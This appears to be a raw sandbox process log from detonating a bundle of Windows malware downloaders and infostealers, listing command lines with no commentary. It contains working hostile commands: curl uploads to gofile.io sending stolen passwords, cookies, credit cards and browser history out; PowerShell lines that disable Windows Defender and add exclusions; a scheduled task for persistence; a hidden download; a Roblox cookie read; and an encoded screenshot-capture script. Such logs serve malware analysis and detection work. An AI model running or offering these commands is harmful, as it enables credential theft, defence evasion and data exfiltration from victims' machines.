"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5460 /prefetch:1

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\QuizPokemon.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\QuizPokemon.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy Anyone Anyone.cmd & Anyone.cmd

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\t.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\t.exe"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa.exe opssvc.exe"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c md 812297

C:\Windows\SysWOW64\findstr.exe

findstr /V "IndieBeachesHonIo" Janet

C:\Windows\sysnldcvmr.exe

C:\Windows\sysnldcvmr.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b Praise + Bee + Random + Acoustic + Predict + Shannon + Extreme + Gnome + Sandra + Wright + Ready + Bb + Dot + Almost + Do + Continental 812297\g

C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif

812297\Shopzilla.pif 812297\g

C:\Windows\SysWOW64\timeout.exe

timeout 15

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /create /tn "MindTechPro360" /tr "wscript //B 'C:\Users\Admin\AppData\Local\TechMind360 Innovations Co\MindTechPro360.js'" /sc onlogon /F /RL HIGHEST

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\shost.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\shost.exe"

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\shost.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\shost.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /im firefox.exe /t /f >nul 2>&1"

C:\Windows\system32\taskkill.exe

taskkill /im firefox.exe /t /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckpasswords.txt" https://store4.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckpasswords.txt" https://store4.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckcookies.txt" https://store4.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckcookies.txt" https://store4.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckcreditcards.txt" https://store4.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckcreditcards.txt" https://store4.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckautofill.txt" https://store4.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckautofill.txt" https://store4.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckhistory.txt" https://store4.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckhistory.txt" https://store4.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckparsedcookies.txt" https://store4.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckparsedcookies.txt" https://store4.gofile.io/uploadFile

C:\Users\Admin\AppData\Local\Temp\3076928777.exe

C:\Users\Admin\AppData\Local\Temp\3076928777.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckbookmarks.txt" https://store4.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckbookmarks.txt" https://store4.gofile.io/uploadFile

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Client-built.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Client-built.exe"

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Amadeus.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Amadeus.exe"

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\qhos.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\qhos.exe"

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\qhos.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\qhos.exe"

C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif

C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\QuizPokemon.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\QuizPokemon.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy Anyone Anyone.cmd & Anyone.cmd

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa.exe opssvc.exe"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c md 812297

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b Praise + Bee + Random + Acoustic + Predict + Shannon + Extreme + Gnome + Sandra + Wright + Ready + Bb + Dot + Almost + Do + Continental 812297\g

C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif

812297\Shopzilla.pif 812297\g

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\phost.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\phost.exe"

C:\Windows\SysWOW64\timeout.exe

timeout 15

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\phost.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\phost.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\phost.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permission and try again.', 0, 'Access Denied', 48+16);close()""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\center.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\center.exe"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\phost.exe'

C:\Windows\system32\mshta.exe

mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permission and try again.', 0, 'Access Denied', 48+16);close()"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\in.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\in.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\CenterRun.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\CenterRun.exe

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9F7D.tmp\9F7E.tmp\9F7F.bat "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\in.exe""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/homboz/arht/releases/download/seht/archive.htm/' -outfile archive.htm"

C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe

"C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x00000000000004C8 0x00000000000004D8

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\   ‏ .scr'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\   ‏ .scr'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profile"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "systeminfo"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="

C:\Windows\System32\Wbem\WMIC.exe

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\netsh.exe

netsh wlan show profile

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\attrib.exe

attrib -r C:\Windows\System32\drivers\etc\hosts

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\attrib.exe

attrib +r C:\Windows\System32\drivers\etc\hosts

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xfbs1blz\xfbs1blz.cmdline"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

